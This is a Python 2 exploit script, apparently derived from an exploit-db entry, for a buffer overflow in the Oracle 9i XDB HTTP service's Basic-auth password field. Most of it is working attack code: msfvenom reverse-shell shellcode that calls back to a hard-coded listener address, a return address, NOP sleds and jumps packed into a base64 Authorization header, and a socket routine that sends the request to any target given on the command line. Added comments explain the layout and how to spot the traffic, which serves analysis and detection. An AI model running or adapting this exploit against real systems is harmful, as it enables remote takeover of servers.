# Exploit for Oracle 9i XDB HTTP PASS Overflow (win32)
# Based on https://www.exploit-db.com/exploits/16809/
# By TIMLAB timip.net
# Use in the form "python oracle9i_xdb_http_pass.py <Target IP Address> <Target Port No.>"
# Target Port No. = 8080
#
# NOTE(review): Python 2 only. The `print` statement at the bottom is a
# SyntaxError under Python 3, and every "\x.." literal in this file is
# handled as a raw byte string (Python 2 `str`) end to end.
#
# What the script does, for anyone triaging it: it builds a single HTTP GET
# request whose `Authorization: Basic` value decodes to a `user:password`
# pair with an oversized password (the "PASS" field named in the title),
# sends it over one TCP connection and closes without reading any reply.
# Detection: a Basic credential of this size (the encoded header value is
# well over a kilobyte) is far outside anything a normal client sends and
# stands out in web-server / XDB listener logs or in a network capture.
import sys, socket, base64
# Please replace it with your shellcode!!!!!!
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.134 LPORT=4445 -b '\x00' -f python
# `buf` is the raw second-stage payload (encoded shellcode, per the msfvenom
# line above) and is the only part of the request the author expects a user
# to swap out.  Everything that follows it is the fixed overflow layout.
buf = ""
buf += "\xd9\xc4\xbb\x69\x6e\xb8\x34\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x34\x7d\x5a"
buf += "\xc1\x3a\x69\x18\x2a\xc2\x6a\x7d\xa2\x27\x5b\xbd\xd0"
buf += "\x2c\xcc\x0d\x92\x60\xe1\xe6\xf6\x90\x72\x8a\xde\x97"
buf += "\x33\x21\x39\x96\xc4\x1a\x79\xb9\x46\x61\xae\x19\x76"
buf += "\xaa\xa3\x58\xbf\xd7\x4e\x08\x68\x93\xfd\xbc\x1d\xe9"
buf += "\x3d\x37\x6d\xff\x45\xa4\x26\xfe\x64\x7b\x3c\x59\xa7"
buf += "\x7a\x91\xd1\xee\x64\xf6\xdc\xb9\x1f\xcc\xab\x3b\xc9"
buf += "\x1c\x53\x97\x34\x91\xa6\xe9\x71\x16\x59\x9c\x8b\x64"
buf += "\xe4\xa7\x48\x16\x32\x2d\x4a\xb0\xb1\x95\xb6\x40\x15"
buf += "\x43\x3d\x4e\xd2\x07\x19\x53\xe5\xc4\x12\x6f\x6e\xeb"
buf += "\xf4\xf9\x34\xc8\xd0\xa2\xef\x71\x41\x0f\x41\x8d\x91"
buf += "\xf0\x3e\x2b\xda\x1d\x2a\x46\x81\x49\x9f\x6b\x39\x8a"
buf += "\xb7\xfc\x4a\xb8\x18\x57\xc4\xf0\xd1\x71\x13\xf6\xcb"
buf += "\xc6\x8b\x09\xf4\x36\x82\xcd\xa0\x66\xbc\xe4\xc8\xec"
buf += "\x3c\x08\x1d\xa2\x6c\xa6\xce\x03\xdc\x06\xbf\xeb\x36"
buf += "\x89\xe0\x0c\x39\x43\x89\xa7\xc0\x04\xbc\x3c\xca\x52"
buf += "\xa8\x40\xca\x4b\x74\xcc\x2c\x01\x96\x98\xe7\xbe\x0f"
buf += "\x81\x73\x5e\xcf\x1f\xfe\x60\x5b\xac\xff\x2f\xac\xd9"
buf += "\x13\xc7\x5c\x94\x49\x4e\x62\x02\xe5\x0c\xf1\xc9\xf5"
buf += "\x5b\xea\x45\xa2\x0c\xdc\x9f\x26\xa1\x47\x36\x54\x38"
buf += "\x11\x71\xdc\xe7\xe2\x7c\xdd\x6a\x5e\x5b\xcd\xb2\x5f"
buf += "\xe7\xb9\x6a\x36\xb1\x17\xcd\xe0\x73\xc1\x87\x5f\xda"
buf += "\x85\x5e\xac\xdd\xd3\x5e\xf9\xab\x3b\xee\x54\xea\x44"
buf += "\xdf\x30\xfa\x3d\x3d\xa1\x05\x94\x85\xd1\x4f\xb4\xac"
buf += "\x79\x16\x2d\xed\xe7\xa9\x98\x32\x1e\x2a\x28\xcb\xe5"
buf += "\x32\x59\xce\xa2\xf4\xb2\xa2\xbb\x90\xb4\x11\xbb\xb0"
# Target taken straight from argv; there is no argument-count or format
# check, so running without both arguments raises IndexError here.
host = sys.argv[1]
# Kept as a string: it is spliced into the Host header as text below and
# only converted with int() for the connect() call.
port = sys.argv[2]
# Four bytes dropped into the buffer right after the first short jump; the
# name suggests the overwritten return address.  Which module/build of the
# target it points into is not recorded on this page.
ret = "\x46\x6d\x61\x60"
# Seven-byte x86 stub placed immediately before `buf`; the name says it is
# an adjustment that runs ahead of the shellcode's decoder (not verified here).
prependEncoder = "\x81\xc4\xff\xef\xff\xff\x44"
# Credential body: 4 bytes of user name, the ':' separator, then the padding
# that overflows the password field.
prep = "\x41" * 4 + ":" + "\x41" * 442
# Short jump (\xeb = jmp rel8), two NOPs (\x90), then `ret` -- the
# control-transfer part of the layout.
prep += "\xeb\x64" + "\x90" * 2 + ret
# NOP sled, a second short jump, more NOPs, the stub and finally the
# shellcode.  By my count this is about 1.2 KB of raw payload before encoding.
prep += "\x90" * 266 + "\xeb\x10" + "\x90" * 109 + prependEncoder + buf
# Python 2 str -> str.  The overflow travels base64-encoded inside the
# Authorization header, so the raw bytes never appear unencoded on the wire.
prep = base64.b64encode(prep)
# One complete HTTP/1.1 request: GET /, a Host header built from argv, and
# the oversized Basic credential.  Header lines use explicit CRLF.
exploit = "GET / HTTP/1.1\x0d\x0a" + "Host: " + host + ":" + port + "\x0d\x0aAuthorization: Basic " + prep + "\x0d\x0a\x0d\x0a"
# Single TCP connection; the request is sent in full and the socket is
# closed without reading any response, so the script gets no feedback on
# whether the target was affected (hence the unconditional message below).
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, int(port)))
client.sendall(exploit)
client.close()
# Python 2 print statement (statement form, not a function call).
print 'Done! Try harder!'